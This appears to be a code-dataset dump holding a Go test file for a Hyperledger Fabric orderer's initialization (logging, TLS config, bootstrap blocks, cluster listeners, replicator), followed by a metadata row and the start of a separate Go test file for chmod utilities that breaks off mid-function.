"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"go.uber.org/zap"
"go.uber.org/zap/zapcore"
)
//go:generate counterfeiter -o mocks/signer_serializer.go --fake-name SignerSerializer . signerSerializer
type signerSerializer interface {
identity.SignerSerializer
}
func TestInitializeLogging(t *testing.T) {
origEnvValue := os.Getenv("FABRIC_LOGGING_SPEC")
os.Setenv("FABRIC_LOGGING_SPEC", "foo=debug")
initializeLogging()
assert.Equal(t, "debug", flogging.LoggerLevel("foo"))
os.Setenv("FABRIC_LOGGING_SPEC", origEnvValue)
}
func TestInitializeProfilingService(t *testing.T) {
origEnvValue := os.Getenv("FABRIC_LOGGING_SPEC")
defer os.Setenv("FABRIC_LOGGING_SPEC", origEnvValue)
os.Setenv("FABRIC_LOGGING_SPEC", "debug")
// get a free random port
listenAddr := func() string {
l, _ := net.Listen("tcp", "localhost:0")
l.Close()
return l.Addr().String()
}()
go initializeProfilingService(
&localconfig.TopLevel{
General: localconfig.General{
Profile: localconfig.Profile{
Enabled: true,
Address: listenAddr,
}},
Kafka: localconfig.Kafka{Verbose: true},
},
)
time.Sleep(500 * time.Millisecond)
if _, err := http.Get("http://" + listenAddr + "/" + "/debug/"); err != nil {
t.Logf("Expected pprof to be up (will retry again in 3 seconds): %s", err)
time.Sleep(3 * time.Second)
if _, err := http.Get("http://" + listenAddr + "/" + "/debug/"); err != nil {
t.Fatalf("Expected pprof to be up: %s", err)
}
}
}
func TestInitializeServerConfig(t *testing.T) {
conf := &localconfig.TopLevel{
General: localconfig.General{
ConnectionTimeout: 7 * time.Second,
TLS: localconfig.TLS{
Enabled: true,
ClientAuthRequired: true,
Certificate: "main.go",
PrivateKey: "main.go",
RootCAs: []string{"main.go"},
ClientRootCAs: []string{"main.go"},
},
},
}
sc := initializeServerConfig(conf, nil)
expectedContent, _ := ioutil.ReadFile("main.go")
assert.Equal(t, expectedContent, sc.SecOpts.Certificate)
assert.Equal(t, expectedContent, sc.SecOpts.Key)
assert.Equal(t, [][]byte{expectedContent}, sc.SecOpts.ServerRootCAs)
assert.Equal(t, [][]byte{expectedContent}, sc.SecOpts.ClientRootCAs)
sc = initializeServerConfig(conf, nil)
defaultOpts := comm.DefaultKeepaliveOptions
assert.Equal(t, defaultOpts.ServerMinInterval, sc.KaOpts.ServerMinInterval)
assert.Equal(t, time.Duration(0), sc.KaOpts.ServerInterval)
assert.Equal(t, time.Duration(0), sc.KaOpts.ServerTimeout)
assert.Equal(t, 7*time.Second, sc.ConnectionTimeout)
testDuration := 10 * time.Second
conf.General.Keepalive = localconfig.Keepalive{
ServerMinInterval: testDuration,
ServerInterval: testDuration,
ServerTimeout: testDuration,
}
sc = initializeServerConfig(conf, nil)
assert.Equal(t, testDuration, sc.KaOpts.ServerMinInterval)
assert.Equal(t, testDuration, sc.KaOpts.ServerInterval)
assert.Equal(t, testDuration, sc.KaOpts.ServerTimeout)
sc = initializeServerConfig(conf, nil)
assert.NotNil(t, sc.Logger)
assert.Equal(t, comm.NewServerStatsHandler(&disabled.Provider{}), sc.ServerStatsHandler)
assert.Len(t, sc.UnaryInterceptors, 2)
assert.Len(t, sc.StreamInterceptors, 2)
sc = initializeServerConfig(conf, &prometheus.Provider{})
assert.NotNil(t, sc.ServerStatsHandler)
goodFile := "main.go"
badFile := "does_not_exist"
oldLogger := logger
defer func() { logger = oldLogger }()
logger, _ = floggingtest.NewTestLogger(t)
testCases := []struct {
name string
certificate string
privateKey string
rootCA string
clientRootCert string
clusterCert string
clusterKey string
clusterCA string
}{
{"BadCertificate", badFile, goodFile, goodFile, goodFile, "", "", ""},
{"BadPrivateKey", goodFile, badFile, goodFile, goodFile, "", "", ""},
{"BadRootCA", goodFile, goodFile, badFile, goodFile, "", "", ""},
{"BadClientRootCertificate", goodFile, goodFile, goodFile, badFile, "", "", ""},
{"ClusterBadCertificate", goodFile, goodFile, goodFile, goodFile, badFile, goodFile, goodFile},
{"ClusterBadPrivateKey", goodFile, goodFile, goodFile, goodFile, goodFile, badFile, goodFile},
{"ClusterBadRootCA", goodFile, goodFile, goodFile, goodFile, goodFile, goodFile, badFile},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
conf := &localconfig.TopLevel{
General: localconfig.General{
TLS: localconfig.TLS{
Enabled: true,
ClientAuthRequired: true,
Certificate: tc.certificate,
PrivateKey: tc.privateKey,
RootCAs: []string{tc.rootCA},
ClientRootCAs: []string{tc.clientRootCert},
},
Cluster: localconfig.Cluster{
ClientCertificate: tc.clusterCert,
ClientPrivateKey: tc.clusterKey,
RootCAs: []string{tc.clusterCA},
},
},
}
assert.Panics(t, func() {
if tc.clusterCert == "" {
initializeServerConfig(conf, nil)
} else {
initializeClusterClientConfig(conf)
}
},
)
})
}
}
func TestInitializeBootstrapChannel(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
genesisFile := produceGenesisFile(t, genesisconfig.SampleSingleMSPSoloProfile, "testchannelid")
defer os.Remove(genesisFile)
fileLedgerLocation, _ := ioutil.TempDir("", "main_test-")
defer os.RemoveAll(fileLedgerLocation)
ledgerFactory, _, err := createLedgerFactory(
&localconfig.TopLevel{
FileLedger: localconfig.FileLedger{
Location: fileLedgerLocation,
},
},
&disabled.Provider{},
)
assert.NoError(t, err)
bootstrapConfig := &localconfig.TopLevel{
General: localconfig.General{
BootstrapMethod: "file",
BootstrapFile: genesisFile,
},
}
bootstrapBlock := extractBootstrapBlock(bootstrapConfig)
initializeBootstrapChannel(bootstrapBlock, ledgerFactory)
ledger, err := ledgerFactory.GetOrCreate("testchannelid")
assert.NoError(t, err)
assert.Equal(t, uint64(1), ledger.Height())
}
func TestExtractBootstrapBlock(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
genesisFile := produceGenesisFile(t, genesisconfig.SampleSingleMSPSoloProfile, "testchannelid")
defer os.Remove(genesisFile)
tests := []struct {
config *localconfig.TopLevel
block *common.Block
}{
{
config: &localconfig.TopLevel{
General: localconfig.General{BootstrapMethod: "file", BootstrapFile: genesisFile},
},
block: file.New(genesisFile).GenesisBlock(),
},
{
config: &localconfig.TopLevel{
General: localconfig.General{BootstrapMethod: "none"},
},
block: nil,
},
}
for _, tt := range tests {
b := extractBootstrapBlock(tt.config)
assert.Truef(t, proto.Equal(tt.block, b), "wanted %v, got %v", tt.block, b)
}
}
func TestExtractSysChanLastConfig(t *testing.T) {
tmpdir, err := ioutil.TempDir("", "main_test-")
require.NoError(t, err)
defer os.RemoveAll(tmpdir)
rlf, err := fileledger.New(tmpdir, &disabled.Provider{})
require.NoError(t, err)
conf := genesisconfig.Load(genesisconfig.SampleInsecureSoloProfile, configtest.GetDevConfigDir())
genesisBlock := encoder.New(conf).GenesisBlock()
lastConf := extractSysChanLastConfig(rlf, genesisBlock)
assert.Nil(t, lastConf)
rl, err := rlf.GetOrCreate("testchannelid")
require.NoError(t, err)
err = rl.Append(genesisBlock)
require.NoError(t, err)
lastConf = extractSysChanLastConfig(rlf, genesisBlock)
assert.NotNil(t, lastConf)
assert.Equal(t, uint64(0), lastConf.Header.Number)
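// A nil bootstrap block should cause extractSysChanLastConfig to panic.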
assert.Panics(t, func() {
_ = extractSysChanLastConfig(rlf, nil)
})
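// Append a config envelope as block 1 so the channel's last-config index advances past the genesis block.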
configTx, err := protoutil.CreateSignedEnvelope(common.HeaderType_CONFIG, "testchannelid", nil, &common.ConfigEnvelope{}, 0, 0)
require.NoError(t, err)
nextBlock := blockledger.CreateNextBlock(rl, []*common.Envelope{configTx})
nextBlock.Metadata.Metadata[common.BlockMetadataIndex_SIGNATURES] = protoutil.MarshalOrPanic(&common.Metadata{
Value: protoutil.MarshalOrPanic(&common.OrdererBlockMetadata{
LastConfig: &common.LastConfig{Index: rl.Height()},
}),
})
nextBlock.Metadata.Metadata[common.BlockMetadataIndex_LAST_CONFIG] = protoutil.MarshalOrPanic(&common.Metadata{
Value: protoutil.MarshalOrPanic(&common.LastConfig{Index: rl.Height()}),
})
err = rl.Append(nextBlock)
require.NoError(t, err)
lastConf = extractSysChanLastConfig(rlf, genesisBlock)
assert.NotNil(t, lastConf)
assert.Equal(t, uint64(1), lastConf.Header.Number)
}
func TestSelectClusterBootBlock(t *testing.T) {
bootstrapBlock := &common.Block{Header: &common.BlockHeader{Number: 100}}
lastConfBlock := &common.Block{Header: &common.BlockHeader{Number: 100}}
clusterBoot := selectClusterBootBlock(bootstrapBlock, nil)
assert.NotNil(t, clusterBoot)
assert.Equal(t, uint64(100), clusterBoot.Header.Number)
assert.True(t, bootstrapBlock == clusterBoot)
clusterBoot = selectClusterBootBlock(bootstrapBlock, lastConfBlock)
assert.NotNil(t, clusterBoot)
assert.Equal(t, uint64(100), clusterBoot.Header.Number)
assert.True(t, bootstrapBlock == clusterBoot)
lastConfBlock.Header.Number = 200
clusterBoot = selectClusterBootBlock(bootstrapBlock, lastConfBlock)
assert.NotNil(t, clusterBoot)
assert.Equal(t, uint64(200), clusterBoot.Header.Number)
assert.True(t, lastConfBlock == clusterBoot)
bootstrapBlock.Header.Number = 300
clusterBoot = selectClusterBootBlock(bootstrapBlock, lastConfBlock)
assert.NotNil(t, clusterBoot)
assert.Equal(t, uint64(300), clusterBoot.Header.Number)
assert.True(t, bootstrapBlock == clusterBoot)
}
func TestLoadLocalMSP(t *testing.T) {
t.Run("Happy", func(t *testing.T) {
localMSPDir := configtest.GetDevMspDir()
localMSP := loadLocalMSP(
&localconfig.TopLevel{
General: localconfig.General{
LocalMSPDir: localMSPDir,
LocalMSPID: "SampleOrg",
BCCSP: &factory.FactoryOpts{
ProviderName: "GM",
SwOpts: &factory.SwOpts{
HashFamily: "GMSM3",
SecLevel: 256,
Ephemeral: true,
},
},
},
},
)
require.NotNil(t, localMSP)
id, err := localMSP.GetIdentifier()
require.NoError(t, err)
require.Equal(t, id, "SampleOrg")
})
t.Run("Error", func(t *testing.T) {
oldLogger := logger
defer func() { logger = oldLogger }()
logger, _ = floggingtest.NewTestLogger(t)
assert.Panics(t, func() {
loadLocalMSP(
&localconfig.TopLevel{
General: localconfig.General{
LocalMSPDir: "",
LocalMSPID: "",
},
},
)
})
})
}
func TestInitializeMultichannelRegistrar(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
genesisFile := produceGenesisFile(t, genesisconfig.SampleDevModeSoloProfile, "testchannelid")
defer os.Remove(genesisFile)
conf := genesisConfig(t, genesisFile)
cryptoProvider, err := sw.NewDefaultSecurityLevelWithKeystore(sw.NewDummyKeyStore())
assert.NoError(t, err)
signer := &server_mocks.SignerSerializer{}
t.Run("registrar with a system channel", func(t *testing.T) {
lf, _, err := createLedgerFactory(conf, &disabled.Provider{})
assert.NoError(t, err)
bootBlock := file.New(genesisFile).GenesisBlock()
initializeBootstrapChannel(bootBlock, lf)
registrar := initializeMultichannelRegistrar(
bootBlock,
&replicationInitiator{cryptoProvider: cryptoProvider},
&cluster.PredicateDialer{},
comm.ServerConfig{},
nil,
conf,
signer,
&disabled.Provider{},
&server_mocks.HealthChecker{},
lf,
cryptoProvider,
)
assert.NotNil(t, registrar)
assert.Equal(t, "testchannelid", registrar.SystemChannelID())
})
t.Run("registrar without a system channel", func(t *testing.T) {
conf.General.BootstrapMethod = "none"
conf.General.GenesisFile = ""
lf, _, err := createLedgerFactory(conf, &disabled.Provider{})
assert.NoError(t, err)
registrar := initializeMultichannelRegistrar(
nil,
&replicationInitiator{cryptoProvider: cryptoProvider},
&cluster.PredicateDialer{},
comm.ServerConfig{},
nil,
conf,
signer,
&disabled.Provider{},
&server_mocks.HealthChecker{},
lf,
cryptoProvider,
)
assert.NotNil(t, registrar)
assert.Empty(t, registrar.SystemChannelID())
})
}
func TestInitializeGrpcServer(t *testing.T) {
// get a free random port
listenAddr := func() string {
l, _ := net.Listen("tcp", "localhost:0")
l.Close()
return l.Addr().String()
}()
host := strings.Split(listenAddr, ":")[0]
port, _ := strconv.ParseUint(strings.Split(listenAddr, ":")[1], 10, 16)
conf := &localconfig.TopLevel{
General: localconfig.General{
ListenAddress: host,
ListenPort: uint16(port),
TLS: localconfig.TLS{
Enabled: false,
ClientAuthRequired: false,
},
},
}
assert.NotPanics(t, func() {
grpcServer := initializeGrpcServer(conf, initializeServerConfig(conf, nil))
grpcServer.Listener().Close()
})
}
// generateCryptoMaterials uses cryptogen to generate the necessary
// MSP files and TLS certificates
func generateCryptoMaterials(t *testing.T, cryptogen string) string {
gt := NewGomegaWithT(t)
cryptoPath := filepath.Join(tempDir, "crypto")
cmd := exec.Command(
cryptogen,
"generate",
"--config", filepath.Join(tempDir, "examplecom-config.yaml"),
"--output", cryptoPath,
)
cryptogenProcess, err := gexec.Start(cmd, nil, nil)
gt.Expect(err).NotTo(HaveOccurred())
gt.Eventually(cryptogenProcess, time.Minute).Should(gexec.Exit(0))
return cryptoPath
}
func TestUpdateTrustedRoots(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
genesisFile := produceGenesisFile(t, genesisconfig.SampleDevModeSoloProfile, "testchannelid")
defer os.Remove(genesisFile)
cryptoPath := generateCryptoMaterials(t, cryptogen)
defer os.RemoveAll(cryptoPath)
// get a free random port
listenAddr := func() string {
l, _ := net.Listen("tcp", "localhost:0")
l.Close()
return l.Addr().String()
}()
port, _ := strconv.ParseUint(strings.Split(listenAddr, ":")[1], 10, 16)
conf := &localconfig.TopLevel{
General: localconfig.General{
BootstrapMethod: "file",
BootstrapFile: genesisFile,
ListenAddress: "localhost",
ListenPort: uint16(port),
TLS: localconfig.TLS{
Enabled: false,
ClientAuthRequired: false,
},
},
}
grpcServer := initializeGrpcServer(conf, initializeServerConfig(conf, nil))
caMgr := &caManager{
appRootCAsByChain: make(map[string][][]byte),
ordererRootCAsByChain: make(map[string][][]byte),
}
callback := func(bundle *channelconfig.Bundle) {
if grpcServer.MutualTLSRequired() {
t.Log("callback called")
caMgr.updateTrustedRoots(bundle, grpcServer)
}
}
lf, _, err := createLedgerFactory(conf, &disabled.Provider{})
assert.NoError(t, err)
bootBlock := file.New(genesisFile).GenesisBlock()
initializeBootstrapChannel(bootBlock, lf)
signer := &server_mocks.SignerSerializer{}
cryptoProvider, err := sw.NewDefaultSecurityLevelWithKeystore(sw.NewDummyKeyStore())
assert.NoError(t, err)
initializeMultichannelRegistrar(
bootBlock,
&replicationInitiator{cryptoProvider: cryptoProvider},
&cluster.PredicateDialer{},
comm.ServerConfig{},
nil,
genesisConfig(t, genesisFile),
signer,
&disabled.Provider{},
&server_mocks.HealthChecker{},
lf,
cryptoProvider,
callback,
)
t.Logf("# app CAs: %d", len(caMgr.appRootCAsByChain["testchannelid"]))
t.Logf("# orderer CAs: %d", len(caMgr.ordererRootCAsByChain["testchannelid"]))
// mutual TLS not required so no updates should have occurred
assert.Equal(t, 0, len(caMgr.appRootCAsByChain["testchannelid"]))
assert.Equal(t, 0, len(caMgr.ordererRootCAsByChain["testchannelid"]))
grpcServer.Listener().Close()
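// Re-create the server with TLS and client auth enabled so the callback actually updates the trusted roots and the cluster dialer.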
conf = &localconfig.TopLevel{
General: localconfig.General{
ListenAddress: "localhost",
ListenPort: uint16(port),
TLS: localconfig.TLS{
Enabled: true,
ClientAuthRequired: true,
PrivateKey: filepath.Join(cryptoPath, "ordererOrganizations", "example.com", "orderers", "127.0.0.1.example.com", "tls", "server.key"),
Certificate: filepath.Join(cryptoPath, "ordererOrganizations", "example.com", "orderers", "127.0.0.1.example.com", "tls", "server.crt"),
},
},
}
grpcServer = initializeGrpcServer(conf, initializeServerConfig(conf, nil))
caMgr = &caManager{
appRootCAsByChain: make(map[string][][]byte),
ordererRootCAsByChain: make(map[string][][]byte),
}
clusterConf := initializeClusterClientConfig(conf)
predDialer := &cluster.PredicateDialer{
Config: clusterConf,
}
callback = func(bundle *channelconfig.Bundle) {
if grpcServer.MutualTLSRequired() {
t.Log("callback called")
caMgr.updateTrustedRoots(bundle, grpcServer)
caMgr.updateClusterDialer(predDialer, clusterConf.SecOpts.ServerRootCAs)
}
}
initializeMultichannelRegistrar(
bootBlock,
&replicationInitiator{cryptoProvider: cryptoProvider},
predDialer,
comm.ServerConfig{},
nil,
genesisConfig(t, genesisFile),
signer,
&disabled.Provider{},
&server_mocks.HealthChecker{},
lf,
cryptoProvider,
callback,
)
t.Logf("# app CAs: %d", len(caMgr.appRootCAsByChain["testchannelid"]))
t.Logf("# orderer CAs: %d", len(caMgr.ordererRootCAsByChain["testchannelid"]))
// mutual TLS is required so updates should have occurred
// we expect an intermediate and root CA for apps and orderers
assert.Equal(t, 2, len(caMgr.appRootCAsByChain["testchannelid"]))
assert.Equal(t, 2, len(caMgr.ordererRootCAsByChain["testchannelid"]))
assert.Len(t, predDialer.Config.SecOpts.ServerRootCAs, 2)
grpcServer.Listener().Close()
}
func TestConfigureClusterListener(t *testing.T) {
logEntries := make(chan string, 100)
allocatePort := func() uint16 {
l, err := net.Listen("tcp", "127.0.0.1:0")
assert.NoError(t, err)
_, portStr, err := net.SplitHostPort(l.Addr().String())
assert.NoError(t, err)
port, err := strconv.ParseInt(portStr, 10, 64)
assert.NoError(t, err)
assert.NoError(t, l.Close())
t.Log("picked unused port", port)
return uint16(port)
}
unUsedPort := allocatePort()
backupLogger := logger
logger = logger.WithOptions(zap.Hooks(func(entry zapcore.Entry) error {
logEntries <- entry.Message
return nil
}))
defer func() {
logger = backupLogger
}()
ca, err := tlsgen.NewCA()
assert.NoError(t, err)
serverKeyPair, err := ca.NewServerCertKeyPair("127.0.0.1")
assert.NoError(t, err)
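// loadPEM is a stub PEM loader keyed by logical names: "cert", "key" and "ca" return in-memory material, anything else simulates an I/O error.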
loadPEM := func(fileName string) ([]byte, error) {
switch fileName {
case "cert":
return serverKeyPair.Cert, nil
case "key":
return serverKeyPair.Key, nil
case "ca":
return ca.CertBytes(), nil
default:
return nil, errors.New("I/O error")
}
}
for _, testCase := range []struct {
name string
conf *localconfig.TopLevel
generalConf comm.ServerConfig
generalSrv *comm.GRPCServer
shouldBeEqual bool
expectedPanic string
expectedLogEntries []string
}{
{
name: "invalid certificate",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "key",
ServerCertificate: "bad",
RootCAs: []string{"ca"},
},
},
},
expectedPanic: "Failed to load cluster server certificate from 'bad' (I/O error)",
generalSrv: &comm.GRPCServer{},
expectedLogEntries: []string{"Failed to load cluster server certificate from 'bad' (I/O error)"},
},
{
name: "invalid key",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "bad",
ServerCertificate: "cert",
RootCAs: []string{"ca"},
},
},
},
expectedPanic: "Failed to load cluster server key from 'bad' (I/O error)",
generalSrv: &comm.GRPCServer{},
expectedLogEntries: []string{"Failed to load cluster server key from 'bad' (I/O error)"},
},
{
name: "invalid ca cert",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "key",
ServerCertificate: "cert",
RootCAs: []string{"bad"},
},
},
},
expectedPanic: "Failed to load CA cert file 'bad' (I/O error)",
generalSrv: &comm.GRPCServer{},
expectedLogEntries: []string{"Failed to load CA cert file 'bad' (I/O error)"},
},
{
name: "bad listen address",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "99.99.99.99",
ListenPort: unUsedPort,
ServerPrivateKey: "key",
ServerCertificate: "cert",
RootCAs: []string{"ca"},
},
},
},
expectedPanic: fmt.Sprintf("Failed creating gRPC server on 99.99.99.99:%d due "+
"to listen tcp 99.99.99.99:%d:", unUsedPort, unUsedPort),
generalSrv: &comm.GRPCServer{},
},
{
name: "green path",
generalConf: comm.ServerConfig{},
conf: &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "key",
ServerCertificate: "cert",
RootCAs: []string{"ca"},
},
},
},
generalSrv: &comm.GRPCServer{},
},
} {
t.Run(testCase.name, func(t *testing.T) {
if testCase.shouldBeEqual {
conf, srv := configureClusterListener(testCase.conf, testCase.generalConf, loadPEM)
assert.Equal(t, conf, testCase.generalConf)
assert.Equal(t, srv, testCase.generalSrv)
}
if testCase.expectedPanic != "" {
f := func() {
configureClusterListener(testCase.conf, testCase.generalConf, loadPEM)
}
assert.Contains(t, panicMsg(f), testCase.expectedPanic)
} else {
configureClusterListener(testCase.conf, testCase.generalConf, loadPEM)
}
// Ensure all expected log messages were logged
var loggedMessages []string
for len(logEntries) > 0 {
logEntry := <-logEntries
loggedMessages = append(loggedMessages, logEntry)
}
assert.Subset(t, loggedMessages, testCase.expectedLogEntries)
})
}
}
func TestReuseListener(t *testing.T) {
t.Run("good to reuse", func(t *testing.T) {
top := &localconfig.TopLevel{General: localconfig.General{TLS: localconfig.TLS{Enabled: true}}}
require.True(t, reuseListener(top, "foo"))
})
t.Run("reuse tls disabled", func(t *testing.T) {
top := &localconfig.TopLevel{}
require.PanicsWithValue(
t,
"TLS is required for running ordering nodes of type foo.",
func() { reuseListener(top, "foo") },
)
})
t.Run("good not to reuse", func(t *testing.T) {
top := &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerPrivateKey: "key",
ServerCertificate: "bad",
},
},
}
require.False(t, reuseListener(top, "foo"))
})
t.Run("partial config", func(t *testing.T) {
top := &localconfig.TopLevel{
General: localconfig.General{
Cluster: localconfig.Cluster{
ListenAddress: "127.0.0.1",
ListenPort: 5000,
ServerCertificate: "bad",
},
},
}
require.PanicsWithValue(
t,
"Options: General.Cluster.ListenPort, General.Cluster.ListenAddress,"+
" General.Cluster.ServerCertificate, General.Cluster.ServerPrivateKey, should be defined altogether.",
func() { reuseListener(top, "foo") },
)
})
}
func TestInitializeEtcdraftConsenter(t *testing.T) {
consenters := make(map[string]consensus.Consenter)
tmpdir, err := ioutil.TempDir("", "main_test-")
require.NoError(t, err)
defer os.RemoveAll(tmpdir)
rlf, err := fileledger.New(tmpdir, &disabled.Provider{})
require.NoError(t, err)
conf := genesisconfig.Load(genesisconfig.SampleInsecureSoloProfile, configtest.GetDevConfigDir())
genesisBlock := encoder.New(conf).GenesisBlock()
ca, _ := tlsgen.NewCA()
crt, _ := ca.NewServerCertKeyPair("127.0.0.1")
srv, err := comm.NewGRPCServer("127.0.0.1:0", comm.ServerConfig{})
assert.NoError(t, err)
cryptoProvider, err := sw.NewDefaultSecurityLevelWithKeystore(sw.NewDummyKeyStore())
assert.NoError(t, err)
initializeEtcdraftConsenter(consenters,
&localconfig.TopLevel{},
rlf,
&cluster.PredicateDialer{},
genesisBlock, &replicationInitiator{cryptoProvider: cryptoProvider},
comm.ServerConfig{
SecOpts: comm.SecureOptions{
Certificate: crt.Cert,
Key: crt.Key,
UseTLS: true,
},
},
srv,
&multichannel.Registrar{},
&disabled.Provider{},
cryptoProvider,
)
assert.NotNil(t, consenters["etcdraft"])
}
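// genesisConfig returns a minimal orderer configuration that bootstraps from the given genesis file using the sample dev MSP.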
func genesisConfig(t *testing.T, genesisFile string) *localconfig.TopLevel {
t.Helper()
localMSPDir := configtest.GetDevMspDir()
return &localconfig.TopLevel{
General: localconfig.General{
BootstrapMethod: "file",
BootstrapFile: genesisFile,
LocalMSPDir: localMSPDir,
LocalMSPID: "SampleOrg",
BCCSP: &factory.FactoryOpts{
ProviderName: "SW",
SwOpts: &factory.SwOpts{
HashFamily: "SHA2",
SecLevel: 256,
Ephemeral: true,
},
},
},
}
}
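// panicMsg runs f, recovers the panic it raises, and returns the panic value as a string.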
func panicMsg(f func()) string {
var message interface{}
func() {
defer func() {
message = recover()
}()
f()
}()
return message.(string)
}
func TestCreateReplicator(t *testing.T) {
cleanup := configtest.SetDevFabricConfigPath(t)
defer cleanup()
bootBlock := encoder.New(genesisconfig.Load(genesisconfig.SampleDevModeSoloProfile)).GenesisBlockForChannel("system")
iterator := &deliver_mocks.BlockIterator{}
iterator.NextReturnsOnCall(0, bootBlock, common.Status_SUCCESS)
iterator.NextReturnsOnCall(1, bootBlock, common.Status_SUCCESS)
ledger := &server_mocks.ReadWriter{}
ledger.HeightReturns(1)
ledger.IteratorReturns(iterator, 1)
ledgerFactory := &server_mocks.Factory{}
ledgerFactory.On("GetOrCreate", "mychannel").Return(ledger, nil)
ledgerFactory.On("ChannelIDs").Return([]string{"mychannel"})
cryptoProvider, err := sw.NewDefaultSecurityLevelWithKeystore(sw.NewDummyKeyStore())
assert.NoError(t, err)
signer := &server_mocks.SignerSerializer{}
r := createReplicator(ledgerFactory, bootBlock, &localconfig.TopLevel{}, comm.SecureOptions{}, signer, cryptoProvider)
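// A block with no signatures should fail policy evaluation on the application channel but pass on the bootstrapped system channel.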
err = r.verifierRetriever.RetrieveVerifier("mychannel").VerifyBlockSignature(nil, nil)
assert.EqualError(t, err, "implicit policy evaluation failed - 0 sub-policies were satisfied, but this policy requires 1 of the 'Writers' sub-policies to be satisfied")
err = r.verifierRetriever.RetrieveVerifier("system").VerifyBlockSignature(nil, nil)
assert.NoError(t, err)
}
func produceGenesisFile(t *testing.T, profile, channelID string) string {
conf := genesisconfig.Load(profile, configtest.GetDevConfigDir())
f, err := ioutil.TempFile("", fmt.Sprintf("%s-genesis_block-", t.Name()))
require.NoError(t, err)
_, err = f.Write(protoutil.MarshalOrPanic(encoder.New(conf).GenesisBlockForChannel(channelID)))
require.NoError(t, err)
err = f.Close()
require.NoError(t, err)
return f.Name()
}
| [
"\"FABRIC_LOGGING_SPEC\"",
"\"FABRIC_LOGGING_SPEC\""
]
| []
| [
"FABRIC_LOGGING_SPEC"
]
| [] | ["FABRIC_LOGGING_SPEC"] | go | 1 | 0 | |
pkg/sys/fileutil_test.go | package sys
import (
"fmt"
"io/ioutil"
"os"
"path"
"path/filepath"
"runtime"
"strings"
"testing"
"testing/iotest"
"github.com/phR0ze/n/pkg/test"
"github.com/stretchr/testify/assert"
)
func TestChmod(t *testing.T) {
resetTest()
// Create test files in dir for globbing and validate modes
dir, err := MkdirP(path.Join(tmpDir, "dir"))
assert.Equal(t, os.ModeDir|os.FileMode(0755), Mode(dir))
assert.Nil(t, err)
file1, err := CopyFile(testfile, path.Join(dir, "file1"))
assert.Nil(t, err)
assert.Equal(t, os.FileMode(0644), Mode(file1))
file2, err := CopyFile(testfile, path.Join(dir, "file2"))
assert.Nil(t, err)
assert.Equal(t, os.FileMode(0644), Mode(file2))
bob1, err := CopyFile(testfile, path.Join(dir, "bob1"))
assert.Nil(t, err)
assert.Equal(t, os.FileMode(0644), Mode(bob1))
// force chmod to fail
{
test.OneShotForceOSChmodError()
err := Chmod(dir, 0644)
assert.True(t, strings.HasPrefix(err.Error(), "failed to add permissions with chmod"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
}
// glob and recurse means globbing wins when working with files
// but recursion wins when working with dirs
{
err := Chmod(path.Join(dir, "*1"), 0444, RecurseOpt(true))
assert.Nil(t, err)
assert.Equal(t, os.ModeDir|os.FileMode(0755), Mode(dir))
assert.Equal(t, os.FileMode(0444), Mode(file1))
assert.Equal(t, os.FileMode(0644), Mode(file2))
assert.Equal(t, os.FileMode(0444), Mode(bob1))
}
// recurse and try only opts
{
// Apply to all files/dirs
err := Chmod(dir, 0600, RecurseOpt(true))
assert.Nil(t, err)
assert.Equal(t, os.ModeDir|os.FileMode(0600), Mode(dir))
// Now we can't validate these yet as we lost execute on the dir
// Now fix the dirs only
err = Chmod(dir, 0755, RecurseOpt(true), OnlyDirsOpt(true))
assert.Nil(t, err)
assert.Equal(t, os.ModeDir|os.FileMode(0755), Mode(dir))
assert.Equal(t, os.FileMode(0600), Mode(file1))
assert.Equal(t, os.FileMode(0600), Mode(file2))
assert.Equal(t, os.FileMode(0600), Mode(bob1))
// Now change just the files back to 644
err = Chmod(dir, 0644, RecurseOpt(true), OnlyFilesOpt(true))
assert.Nil(t, err)
assert.Equal(t, os.ModeDir|os.FileMode(0755), Mode(dir))
assert.Equal(t, os.FileMode(0644), Mode(file1))
assert.Equal(t, os.FileMode(0644), Mode(file2))
assert.Equal(t, os.FileMode(0644), Mode(bob1))
}
// invalid file globbing i.e. doesn't exist
{
err := Chmod(path.Join(tmpDir, "bogus"), 0644)
assert.True(t, strings.HasPrefix(err.Error(), "failed to get any sources for"))
}
// No path given
{
err := Chmod("", 0644)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
}
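// TestRevokingMode exercises revokingMode, which reports whether changing from the first mode to the second removes any permission bit; the cases below cover the other, group and owner octets in turn.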
func TestRevokingMode(t *testing.T) {
// Test other octect
assert.False(t, revokingMode(0777, 0777))
assert.False(t, revokingMode(0776, 0775))
assert.False(t, revokingMode(0770, 0771))
assert.True(t, revokingMode(0776, 0772))
assert.True(t, revokingMode(0775, 0776))
assert.True(t, revokingMode(0775, 0774))
// Test group octect
assert.False(t, revokingMode(0777, 0777))
assert.False(t, revokingMode(0767, 0757))
assert.False(t, revokingMode(0707, 0717))
assert.True(t, revokingMode(0767, 0727))
assert.True(t, revokingMode(0757, 0767))
assert.True(t, revokingMode(0757, 0747))
// Test owner octect
assert.False(t, revokingMode(0777, 0777))
assert.False(t, revokingMode(0677, 0577))
assert.False(t, revokingMode(0077, 0177))
assert.True(t, revokingMode(0677, 0277))
assert.True(t, revokingMode(0577, 0677))
